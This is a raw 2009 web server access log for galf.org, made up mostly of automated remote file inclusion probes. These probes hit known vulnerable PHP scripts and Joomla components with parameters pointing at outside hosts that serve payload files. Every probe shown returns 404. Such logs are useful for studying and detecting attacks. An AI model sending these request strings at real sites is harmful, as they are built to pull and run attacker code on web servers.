72.37.199.41 - - [28/Dec/2009:07:33:23 -0800] "GET /logs/access.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.255.32.182 - - [28/Dec/2009:07:35:08 -0800] "GET /skin/zero_vote/error.php?dir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.32.182 - - [28/Dec/2009:07:35:08 -0800] "GET /logs/access_090928.log//skin/zero_vote/error.php?dir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.32.182 - - [28/Dec/2009:07:35:08 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:07:35:36 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:07:35:36 -0800] "GET /logs/access_090928.log//skin/zero_vote/error.php?dir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:07:35:36 -0800] "GET /skin/zero_vote/error.php?dir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.32.182 - - [28/Dec/2009:07:36:13 -0800] "GET /skin/zero_vote/error.php?dir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.32.182 - - [28/Dec/2009:07:36:13 -0800] "GET /logs/access_090928.log//skin/zero_vote/error.php?dir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.32.182 - - [28/Dec/2009:07:36:13 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:07:37:04 -0800] "GET /skin/zero_vote/error.php?dir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:07:37:04 -0800] "GET /logs/access_090928.log%20%20//skin/zero_vote/error.php?dir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:07:37:34 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:07:37:34 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:07:37:34 -0800] "GET /logs/access_090706.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:07:37:36 -0800] "GET /logs/access_090706.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:07:37:36 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:07:37:36 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.219.142.137 - - [28/Dec/2009:07:37:49 -0800] "GET /logs/access_091116.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.219.142.137 - - [28/Dec/2009:07:37:49 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.219.142.137 - - [28/Dec/2009:07:37:49 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.118.186 - - [28/Dec/2009:07:37:52 -0800] "GET /logs/access_091116.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.247.146 - - [28/Dec/2009:07:37:58 -0800] "GET /logs/access_091116.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.118.186 - - [28/Dec/2009:07:38:02 -0800] "GET /logs/access_091221.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.247.146 - - [28/Dec/2009:07:38:03 -0800] "GET /logs/access_091221.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:07:38:16 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:07:38:17 -0800] "GET /skin/zero_vote/error.php?dir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:07:38:19 -0800] "GET /logs/access_090928.log%20%20//skin/zero_vote/error.php?dir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:07:38:23 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:07:38:23 -0800] "GET /logs/access_090706.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:07:38:23 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:07:39:46 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:07:39:46 -0800] "GET /logs/access_090928.log//skin/zero_vote/error.php?dir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:07:39:46 -0800] "GET /skin/zero_vote/error.php?dir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:07:40:00 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:07:40:00 -0800] "GET /skin/zero_vote/error.php?dir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:07:40:00 -0800] "GET /logs/access_090928.log//skin/zero_vote/error.php?dir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:07:42:07 -0800] "GET /logs/access_091116.log/myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:07:42:07 -0800] "GET /logs/access.log/myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.37.199.41 - - [28/Dec/2009:07:42:13 -0800] "GET /ignore//bbs//skin/ggambo7002_board/write.php?dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:07:42:13 -0800] "GET /logs/ignore//bbs//skin/ggambo7002_board/write.php?dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:07:42:13 -0800] "GET /logs/access.log%20%20/ignore//bbs//skin/ggambo7002_board/write.php?dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:07:42:13 -0800] "GET /ignore//bbs//skin/ggambo7002_board/write.php?dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:07:42:13 -0800] "GET /logs/access.log%20%20/ignore//bbs//skin/ggambo7002_board/write.php?dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:07:42:13 -0800] "GET /logs/ignore//bbs//skin/ggambo7002_board/write.php?dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:07:42:45 -0800] "GET /logs/access_091221.log%20%20/ignore//bbs//skin/ggambo7002_board/write.php?dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:07:42:59 -0800] "GET /logs/access_091221.log%20%20/ignore//bbs//skin/ggambo7002_board/write.php?dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.250.252.242 - - [28/Dec/2009:07:43:58 -0800] "GET /logs/access_091005.log HTTP/1.1" 200 7786947 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:07:44:47 -0800] "GET /logs/access_091116.log/myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:07:44:49 -0800] "GET /logs/access.log/myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
66.98.168.97 - - [28/Dec/2009:07:44:53 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.98.168.97 - - [28/Dec/2009:07:44:53 -0800] "GET /logs/access_090629.log%20%20/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.98.168.97 - - [28/Dec/2009:07:44:53 -0800] "GET /logs/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.98.168.97 - - [28/Dec/2009:07:45:03 -0800] "GET /logs/access_090713.log%20%20/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:07:45:36 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:07:45:36 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:07:45:36 -0800] "GET /logs/access_091026.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
128.241.54.188 - - [28/Dec/2009:07:45:37 -0800] "GET /logs/step_one.php?server_inc=http://www.swdcourt.com/webboard/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
128.241.54.188 - - [28/Dec/2009:07:45:37 -0800] "GET /step_one.php?server_inc=http://www.swdcourt.com/webboard/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
128.241.54.188 - - [28/Dec/2009:07:45:38 -0800] "GET /logs/access_090921.log%20%20/step_one.php?server_inc=http://www.swdcourt.com/webboard/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
128.241.54.188 - - [28/Dec/2009:07:45:38 -0800] "GET /logs/access_090914.log%20%20/step_one.php?server_inc=http://www.swdcourt.com/webboard/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:07:45:43 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:07:45:43 -0800] "GET /logs/access_091026.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:07:45:43 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
128.241.54.188 - - [28/Dec/2009:07:46:08 -0800] "GET /logs/access_090706.log/step_one.php?server_inc=http://www.swdcourt.com/webboard/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.98.168.97 - - [28/Dec/2009:07:46:10 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.98.168.97 - - [28/Dec/2009:07:46:10 -0800] "GET /logs/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
128.241.54.188 - - [28/Dec/2009:07:46:26 -0800] "GET /logs/access_090713.log/step_one.php?server_inc=http://www.swdcourt.com/webboard/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.98.168.97 - - [28/Dec/2009:07:46:42 -0800] "GET /logs/access_090713.log%20%20/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:07:46:43 -0800] "GET /logs/access_091116.log/myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:07:46:49 -0800] "GET /logs/access.log/myevent.php?myevent_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [28/Dec/2009:07:47:04 -0800] "GET /logs//shop/main.php?_shop_path=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:07:47:04 -0800] "GET /shop/main.php?_shop_path=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:07:47:04 -0800] "GET /logs/access_090525.log%20%20//shop/main.php?_shop_path=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:07:47:11 -0800] "GET /logs//shop/main.php?_shop_path=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:07:47:11 -0800] "GET /logs/access_090525.log//shop/main.php?_shop_path=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:07:47:11 -0800] "GET /shop/main.php?_shop_path=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
128.241.54.188 - - [28/Dec/2009:07:48:42 -0800] "GET /logs/access_091130.log/step_one.php?server_inc=http://www.swdcourt.com/webboard/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
128.241.54.188 - - [28/Dec/2009:07:48:42 -0800] "GET /logs/access_091019.log/step_one.php?server_inc=http://www.swdcourt.com/webboard/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:07:49:26 -0800] "GET /logs/access_090706.log//shop/main.php?_shop_path=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:07:49:26 -0800] "GET /logs//shop/main.php?_shop_path=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [28/Dec/2009:07:49:26 -0800] "GET /shop/main.php?_shop_path=http://honda2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.141.47 - - [28/Dec/2009:07:49:49 -0800] "GET /logs/access_090713.log%20%20/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.141.47 - - [28/Dec/2009:07:49:49 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.141.47 - - [28/Dec/2009:07:49:50 -0800] "GET /logs/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.141.47 - - [28/Dec/2009:07:49:52 -0800] "GET /logs/access_090713.log%20%20/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.141.47 - - [28/Dec/2009:07:49:52 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.141.47 - - [28/Dec/2009:07:49:52 -0800] "GET /logs/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
128.241.54.188 - - [28/Dec/2009:07:50:00 -0800] "GET /logs/access_090810.log/step_one.php?server_inc=http://www.swdcourt.com/webboard/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
128.241.54.188 - - [28/Dec/2009:07:50:01 -0800] "GET /logs/access_090914.log/step_one.php?server_inc=http://www.swdcourt.com/webboard/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:07:50:33 -0800] "GET /ignore//bbs//skin/ggambo7002_board/write.php?dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:07:50:33 -0800] "GET /logs/ignore//bbs//skin/ggambo7002_board/write.php?dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:07:50:33 -0800] "GET /logs/access.log%20%20/ignore//bbs//skin/ggambo7002_board/write.php?dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:07:50:45 -0800] "GET /logs/ignore//bbs//skin/ggambo7002_board/write.php?dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:07:50:45 -0800] "GET /ignore//bbs//skin/ggambo7002_board/write.php?dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:07:50:45 -0800] "GET /logs/access.log%20%20/ignore//bbs//skin/ggambo7002_board/write.php?dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
128.241.54.188 - - [28/Dec/2009:07:51:18 -0800] "GET /logs/access_090921.log/step_one.php?server_inc=http://www.swdcourt.com/webboard/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:07:51:49 -0800] "GET /logs/access_091221.log%20%20/ignore//bbs//skin/ggambo7002_board/write.php?dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.175.13 - - [28/Dec/2009:07:51:59 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.dohio.org/joomla/media/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.121.175.13 - - [28/Dec/2009:07:51:59 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.dohio.org/joomla/media/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
208.43.211.154 - - [28/Dec/2009:07:52:05 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.dohio.org/joomla/media/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
208.43.211.154 - - [28/Dec/2009:07:52:10 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.dohio.org/joomla/media/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
208.43.211.154 - - [28/Dec/2009:07:52:10 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.dohio.org/joomla/media/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:07:52:31 -0800] "GET /logs/access_091221.log%20%20/ignore//bbs//skin/ggambo7002_board/write.php?dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.219.142.137 - - [28/Dec/2009:07:53:16 -0800] "GET /logs/access_091116.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.115.1.59 - - [28/Dec/2009:07:53:29 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
91.121.175.13 - - [28/Dec/2009:07:53:29 -0800] "GET /logs/access_091221.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.dohio.org/joomla/media/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:07:53:31 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://bagoessss.fileave.com/aa.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Dec/2009:07:53:31 -0800] "GET /logs/access.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://bagoessss.fileave.com/aa.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Dec/2009:07:53:31 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://bagoessss.fileave.com/aa.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.219.142.137 - - [28/Dec/2009:07:54:02 -0800] "GET /logs/access_091221.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:07:55:07 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://bagoessss.fileave.com/aa.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Dec/2009:07:55:07 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://bagoessss.fileave.com/aa.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Dec/2009:07:55:08 -0800] "GET /logs/access.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://bagoessss.fileave.com/aa.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Dec/2009:07:55:09 -0800] "GET /logs/access.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://bagoessss.fileave.com/aa.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Dec/2009:07:55:10 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://bagoessss.fileave.com/aa.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Dec/2009:07:55:10 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://bagoessss.fileave.com/aa.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.43.211.154 - - [28/Dec/2009:07:57:05 -0800] "GET /logs/access_091221.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.dohio.org/joomla/media/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
189.72.61.206 - - [28/Dec/2009:07:59:44 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.61.206 - - [28/Dec/2009:07:59:44 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"